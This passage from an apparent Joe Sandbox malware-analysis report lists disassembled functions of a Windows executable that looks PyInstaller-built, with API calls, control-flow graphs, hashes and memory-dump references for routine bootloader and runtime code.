                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                          • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                          • Instruction ID: 2807465dd65e7a314ca9ac35069b3c1c51167159796584078a8cc42211474b4f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C41E063B3DA02D1FA15EB16A8146753395BF48B90F884579ED1EC73B4EE3CE805A344
                                                                                                                                                                                                                                          Function 00007FF67AED36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF67AED3804), ref: 00007FF67AED36E1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED3804), ref: 00007FF67AED36EB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2C9E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2D63
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2C50: MessageBoxW.USER32 ref: 00007FF67AED2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                          • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                          • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                          • Instruction ID: 1068035de5f70f2578dc069b75941140bd83d80a52dbb56b8f66637b006debcc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98216563B3CA4381FA65BB24E8513B62250BFC8394FA041B6E55DC25F5EF2CE505E740
                                                                                                                                                                                                                                          Function 00007FF67AEEBACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 744 7ff67aeebacc-7ff67aeebaf2 745 7ff67aeebaf4-7ff67aeebb08 call 7ff67aee4f58 call 7ff67aee4f78 744->745 746 7ff67aeebb0d-7ff67aeebb11 744->746 764 7ff67aeebefe 745->764 748 7ff67aeebee7-7ff67aeebef3 call 7ff67aee4f58 call 7ff67aee4f78 746->748 749 7ff67aeebb17-7ff67aeebb1e 746->749 766 7ff67aeebef9 call 7ff67aeea950 748->766 749->748 752 7ff67aeebb24-7ff67aeebb52 749->752 752->748 753 7ff67aeebb58-7ff67aeebb5f 752->753 756 7ff67aeebb61-7ff67aeebb73 call 7ff67aee4f58 call 7ff67aee4f78 753->756 757 7ff67aeebb78-7ff67aeebb7b 753->757 756->766 762 7ff67aeebee3-7ff67aeebee5 757->762 763 7ff67aeebb81-7ff67aeebb87 757->763 767 7ff67aeebf01-7ff67aeebf18 762->767 763->762 768 7ff67aeebb8d-7ff67aeebb90 763->768 764->767 766->764 768->756 771 7ff67aeebb92-7ff67aeebbb7 768->771 773 7ff67aeebbea-7ff67aeebbf1 771->773 774 7ff67aeebbb9-7ff67aeebbbb 771->774 775 7ff67aeebbf3-7ff67aeebc1b call 7ff67aeed66c call 7ff67aeea9b8 * 2 773->775 776 7ff67aeebbc6-7ff67aeebbdd call 7ff67aee4f58 call 7ff67aee4f78 call 7ff67aeea950 773->776 777 7ff67aeebbe2-7ff67aeebbe8 774->777 778 7ff67aeebbbd-7ff67aeebbc4 774->778 807 7ff67aeebc1d-7ff67aeebc33 call 7ff67aee4f78 call 7ff67aee4f58 775->807 808 7ff67aeebc38-7ff67aeebc63 call 7ff67aeec2f4 775->808 805 7ff67aeebd70 776->805 779 7ff67aeebc68-7ff67aeebc7f 777->779 778->776 778->777 782 7ff67aeebc81-7ff67aeebc89 779->782 783 7ff67aeebcfa-7ff67aeebd04 call 7ff67aef398c 779->783 782->783 786 7ff67aeebc8b-7ff67aeebc8d 782->786 794 7ff67aeebd8e 783->794 795 7ff67aeebd0a-7ff67aeebd1f 783->795 786->783 792 7ff67aeebc8f-7ff67aeebca5 786->792 792->783 797 7ff67aeebca7-7ff67aeebcb3 792->797 803 7ff67aeebd93-7ff67aeebdb3 ReadFile 794->803 795->794 799 7ff67aeebd21-7ff67aeebd33 GetConsoleMode 795->799 797->783 801 7ff67aeebcb5-7ff67aeebcb7 797->801 799->794 804 7ff67aeebd35-7ff67aeebd3d 799->804 801->783 806 7ff67aeebcb9-7ff67aeebcd1 801->806 809 7ff67aeebead-7ff67aeebeb6 GetLastError 803->809 810 7ff67aeebdb9-7ff67aeebdc1 803->810 804->803 813 7ff67aeebd3f-7ff67aeebd61 ReadConsoleW 804->813 816 7ff67aeebd73-7ff67aeebd7d call 7ff67aeea9b8 805->816 806->783 817 7ff67aeebcd3-7ff67aeebcdf 806->817 807->805 808->779 814 7ff67aeebed3-7ff67aeebed6 809->814 815 7ff67aeebeb8-7ff67aeebece call 7ff67aee4f78 call 7ff67aee4f58 809->815 810->809 811 7ff67aeebdc7 810->811 819 7ff67aeebdce-7ff67aeebde3 811->819 821 7ff67aeebd82-7ff67aeebd8c 813->821 822 7ff67aeebd63 GetLastError 813->822 826 7ff67aeebedc-7ff67aeebede 814->826 827 7ff67aeebd69-7ff67aeebd6b call 7ff67aee4eec 814->827 815->805 816->767 817->783 825 7ff67aeebce1-7ff67aeebce3 817->825 819->816 829 7ff67aeebde5-7ff67aeebdf0 819->829 821->819 822->827 825->783 833 7ff67aeebce5-7ff67aeebcf5 825->833 826->816 827->805 836 7ff67aeebdf2-7ff67aeebe0b call 7ff67aeeb6e4 829->836 837 7ff67aeebe17-7ff67aeebe1f 829->837 833->783 844 7ff67aeebe10-7ff67aeebe12 836->844 840 7ff67aeebe21-7ff67aeebe33 837->840 841 7ff67aeebe9b-7ff67aeebea8 call 7ff67aeeb524 837->841 845 7ff67aeebe35 840->845 846 7ff67aeebe8e-7ff67aeebe96 840->846 841->844 844->816 848 7ff67aeebe3a-7ff67aeebe41 845->848 846->816 849 7ff67aeebe43-7ff67aeebe47 848->849 850 7ff67aeebe7d-7ff67aeebe88 848->850 851 7ff67aeebe63 849->851 852 7ff67aeebe49-7ff67aeebe50 849->852 850->846 854 7ff67aeebe69-7ff67aeebe79 851->854 852->851 853 7ff67aeebe52-7ff67aeebe56 852->853 853->851 856 7ff67aeebe58-7ff67aeebe61 853->856 854->848 855 7ff67aeebe7b 854->855 855->846 856->854
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                          • Instruction ID: d0ead601fb27bc2e1149926211b3a1ea62341e7b40367654e4185b2ffb169fc3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53C1F633A2C68781F760AB1594402BD77A4FB81B80F5582B1EA8E877F1CF7DE8459700
                                                                                                                                                                                                                                          Function 00007FF67AED8760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 995526605-0
                                                                                                                                                                                                                                          • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                          • Instruction ID: 4c2b0c7fd2c71de0b3ccb2cec208d206f839f3b1132c091e5aa39c765a06172e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2217133E1C64282EB50AB55B55022AA3A1FBC5BA0F604275EAAD87AF4DF6CD444DB00
                                                                                                                                                                                                                                          Function 00007FF67AED90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED8760: GetCurrentProcess.KERNEL32 ref: 00007FF67AED8780
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED8760: OpenProcessToken.ADVAPI32 ref: 00007FF67AED8793
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED8760: GetTokenInformation.KERNELBASE ref: 00007FF67AED87B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED8760: GetLastError.KERNEL32 ref: 00007FF67AED87C2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED8760: GetTokenInformation.KERNELBASE ref: 00007FF67AED8802
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF67AED881E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED8760: CloseHandle.KERNEL32 ref: 00007FF67AED8836
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF67AED3C55), ref: 00007FF67AED916C
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF67AED3C55), ref: 00007FF67AED9175
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                          • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                          • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                          • Instruction ID: 6d640fba5e269ab7a0f29a460bf1035e144a0cd591f996756fdfbbf21a3ef68f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17216D32A2878281F650BB20E9152EA6360EFC8780F5440B5EA4DD3BA6DF3CD845E740
                                                                                                                                                                                                                                          Function 00007FF67AEECFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 963 7ff67aeecfd0-7ff67aeecff5 964 7ff67aeed2c3 963->964 965 7ff67aeecffb-7ff67aeecffe 963->965 968 7ff67aeed2c5-7ff67aeed2d5 964->968 966 7ff67aeed000-7ff67aeed032 call 7ff67aeea884 965->966 967 7ff67aeed037-7ff67aeed063 965->967 966->968 970 7ff67aeed065-7ff67aeed06c 967->970 971 7ff67aeed06e-7ff67aeed074 967->971 970->966 970->971 973 7ff67aeed084-7ff67aeed099 call 7ff67aef398c 971->973 974 7ff67aeed076-7ff67aeed07f call 7ff67aeec390 971->974 978 7ff67aeed1b3-7ff67aeed1bc 973->978 979 7ff67aeed09f-7ff67aeed0a8 973->979 974->973 980 7ff67aeed210-7ff67aeed235 WriteFile 978->980 981 7ff67aeed1be-7ff67aeed1c4 978->981 979->978 982 7ff67aeed0ae-7ff67aeed0b2 979->982 983 7ff67aeed240 980->983 984 7ff67aeed237-7ff67aeed23d GetLastError 980->984 985 7ff67aeed1fc-7ff67aeed20e call 7ff67aeeca88 981->985 986 7ff67aeed1c6-7ff67aeed1c9 981->986 987 7ff67aeed0b4-7ff67aeed0bc call 7ff67aee4830 982->987 988 7ff67aeed0c3-7ff67aeed0ce 982->988 992 7ff67aeed243 983->992 984->983 1007 7ff67aeed1a0-7ff67aeed1a7 985->1007 993 7ff67aeed1cb-7ff67aeed1ce 986->993 994 7ff67aeed1e8-7ff67aeed1fa call 7ff67aeecca8 986->994 987->988 989 7ff67aeed0d0-7ff67aeed0d9 988->989 990 7ff67aeed0df-7ff67aeed0f4 GetConsoleMode 988->990 989->978 989->990 998 7ff67aeed1ac 990->998 999 7ff67aeed0fa-7ff67aeed100 990->999 1001 7ff67aeed248 992->1001 1002 7ff67aeed254-7ff67aeed25e 993->1002 1003 7ff67aeed1d4-7ff67aeed1e6 call 7ff67aeecb8c 993->1003 994->1007 998->978 1005 7ff67aeed189-7ff67aeed19b call 7ff67aeec610 999->1005 1006 7ff67aeed106-7ff67aeed109 999->1006 1008 7ff67aeed24d 1001->1008 1009 7ff67aeed260-7ff67aeed265 1002->1009 1010 7ff67aeed2bc-7ff67aeed2c1 1002->1010 1003->1007 1005->1007 1013 7ff67aeed114-7ff67aeed122 1006->1013 1014 7ff67aeed10b-7ff67aeed10e 1006->1014 1007->1001 1008->1002 1015 7ff67aeed293-7ff67aeed29d 1009->1015 1016 7ff67aeed267-7ff67aeed26a 1009->1016 1010->968 1020 7ff67aeed124 1013->1020 1021 7ff67aeed180-7ff67aeed184 1013->1021 1014->1008 1014->1013 1018 7ff67aeed2a4-7ff67aeed2b3 1015->1018 1019 7ff67aeed29f-7ff67aeed2a2 1015->1019 1022 7ff67aeed283-7ff67aeed28e call 7ff67aee4f34 1016->1022 1023 7ff67aeed26c-7ff67aeed27b 1016->1023 1018->1010 1019->964 1019->1018 1025 7ff67aeed128-7ff67aeed13f call 7ff67aef3a58 1020->1025 1021->992 1022->1015 1023->1022 1029 7ff67aeed141-7ff67aeed14d 1025->1029 1030 7ff67aeed177-7ff67aeed17d GetLastError 1025->1030 1031 7ff67aeed14f-7ff67aeed161 call 7ff67aef3a58 1029->1031 1032 7ff67aeed16c-7ff67aeed173 1029->1032 1030->1021 1031->1030 1036 7ff67aeed163-7ff67aeed16a 1031->1036 1032->1021 1033 7ff67aeed175 1032->1033 1033->1025 1036->1032
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67AEECFBB), ref: 00007FF67AEED0EC
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67AEECFBB), ref: 00007FF67AEED177
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                                          • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                          • Instruction ID: 14c4f2d69e68f70beca3e0eb4d64e737d3866a193814c0abb5945e45fc4d33ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B091D673F2D65289F750AF6594802BD2BA1FB44B88F1841B9DE0E97AA5DF3CD482D700
                                                                                                                                                                                                                                          Function 00007FF67AEE5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                          • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction ID: c39134dfe076cbc8157a1f1181bde4c76f954160a48a2d72db510079ec3406e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5419223E2C78283F750AB6096503796360FB947A4F109375EA9C43AE2DF7CA5F09750
                                                                                                                                                                                                                                          Function 00007FF67AEDCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction ID: 9a5ff3a8e457948339756e4c2415db1943d1f08dd9aa8c00c0906f17388ef3bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A316D23E2D14345FA64BB74D8613B917919FC5388F6444B8E94ECB2F3DE2CA885E280
                                                                                                                                                                                                                                          Function 00007FF67AEE9AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                          • Instruction ID: fe496b209e670952fb994302e0683b79b8450ade0affb76a46cb5a5e84815de5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47D09E12B2C74646FB543B706C990795391AF48741F1414FCD84F863B3DD6CE4596700
                                                                                                                                                                                                                                          Function 00007FF67AEE01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
